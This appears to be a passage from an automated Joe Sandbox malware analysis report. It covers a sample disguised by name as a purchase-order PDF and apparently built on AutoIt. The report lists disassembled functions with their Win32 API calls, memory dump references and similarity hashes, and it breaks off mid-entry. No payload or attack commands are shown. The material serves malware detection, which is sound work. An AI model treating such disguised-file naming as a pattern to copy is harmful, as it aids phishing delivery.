                                                                                                                                                                                                                                                                                                            Function 00448759 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                                                                                                                                                                                            Function 0044A0EA Relevance: 31.7, APIs: 21, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32 ref: 0044A277
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1744303182-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                                                                            • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                                                                                                                                                                                                                                            Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                                                                                                                                                            • API String ID: 790654849-1810252412
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                                                                                                                                                                                                                                            Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                                                                                                                                                            • API String ID: 0-1896584978
                                                                                                                                                                                                                                                                                                            • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                                                                                                                                                            • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                                                                                                                                                                                                            Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                            • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                                                                                                                                                                                                            Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                                                                                                                                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                                                                            • API String ID: 1322021666-1919597938
                                                                                                                                                                                                                                                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                                                                                                                                                                                            Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                            • API String ID: 2485277191-404129466
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                                                                                                                                                                                            Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                                                                                                                                                                                            • strncnt.LIBCMT ref: 00428646
                                                                                                                                                                                                                                                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: strncnt$CompareErrorLastString
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1776594460-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                                                                                                                                                                                                            Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                                                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3869813825-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                                                                                                                                                                                                            Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
